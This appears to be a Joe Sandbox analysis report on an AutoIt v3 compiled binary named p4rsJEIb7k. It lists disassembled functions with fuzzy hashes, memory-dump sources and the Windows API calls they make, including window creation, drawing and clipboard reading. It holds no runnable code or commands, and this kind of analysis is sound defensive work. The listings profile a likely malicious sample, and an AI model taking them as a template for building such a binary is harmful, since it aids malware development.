                                                                                                                • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                Function 004212BE Relevance: .3, Instructions: 336COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c47d925e012dda58e8a2147bbcbf95fd97a699f804f8c671293b5c898a81ed87
                                                                                                                • Instruction ID: edaac073b8829911ee68c4be0bcacd547f0c6bb47cd210bca20706155a8c2891
                                                                                                                • Opcode Fuzzy Hash: c47d925e012dda58e8a2147bbcbf95fd97a699f804f8c671293b5c898a81ed87
                                                                                                                • Instruction Fuzzy Hash: 19A1E571700571BBDB259F19A84457F73A2ABE8340BE90897E417DB230D639DC8286DE
                                                                                                                Function 0041A46B Relevance: .3, Instructions: 256COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0a81e3d32886a3826879c9bb5c7ff7792f7acd020c85209a7aca5b77f0b2be7
                                                                                                                • Instruction ID: a9eacd5bf21785df47d5f6a8feadd8f5aba99018e25b90ef92f88a0652348d6e
                                                                                                                • Opcode Fuzzy Hash: b0a81e3d32886a3826879c9bb5c7ff7792f7acd020c85209a7aca5b77f0b2be7
                                                                                                                • Instruction Fuzzy Hash: 4EB17C75901206DFCB15CF04C5D0AE8BBA2BF58318F18C1AED85A5B382D735EE96CB94
                                                                                                                Function 0454AAE8 Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                • Instruction ID: f00384dcc4f28f507cade0c2b2d8a587e1e6f56371027a4bd3a92458558fc8ff
                                                                                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                • Instruction Fuzzy Hash: 1F41A171D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                Function 0454A9D8 Relevance: .0, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                • Instruction ID: 5d26ae49f99aa89a14f51b962384932d30985d29f88fca2e331abc30c2baff5e
                                                                                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                • Instruction Fuzzy Hash: E801A874A40109EFCB84DF99C5909AEF7F5FF88314F208599D809AB741D730AE41DB80
                                                                                                                Function 0454A978 Relevance: .0, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                • Instruction ID: fe491405925457e4298a7a53c3988b4f45a9d62677ef4861f13440f2a4aa11a1
                                                                                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                • Instruction Fuzzy Hash: 93019674A40109EFCB84DF98D5909AEF7B5FF88314F208599D8199B305D730AE41EB80
                                                                                                                Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                Function 04549348 Relevance: .0, Instructions: 6COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                Function 00459384 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                • GetDC.USER32(?), ref: 004598DE
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 1538203242-2373415609
                                                                                                                • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                Function 00433D5C Relevance: 42.2, APIs: 28, Instructions: 198windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1582027408-0
                                                                                                                • Opcode ID: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
                                                                                                                • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                • Opcode Fuzzy Hash: e151e7129dedd9b649cf5279759d6c8ca4f2d2edd5ec07a1e2c3294b07796789
                                                                                                                • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                • CloseClipboard.USER32 ref: 0046C692
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                • CloseClipboard.USER32 ref: 0046C866
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 589737431-2761332787
                                                                                                                • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                                                Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                • API String ID: 541082891-3320066284
                                                                                                                • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                • Opcode ID: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
                                                                                                                • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                • Opcode Fuzzy Hash: 3341d5ccd3f52121a0b9d5f5b9edb9a4c3413db68c9c5c7597b80800bbf161ae
                                                                                                                • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
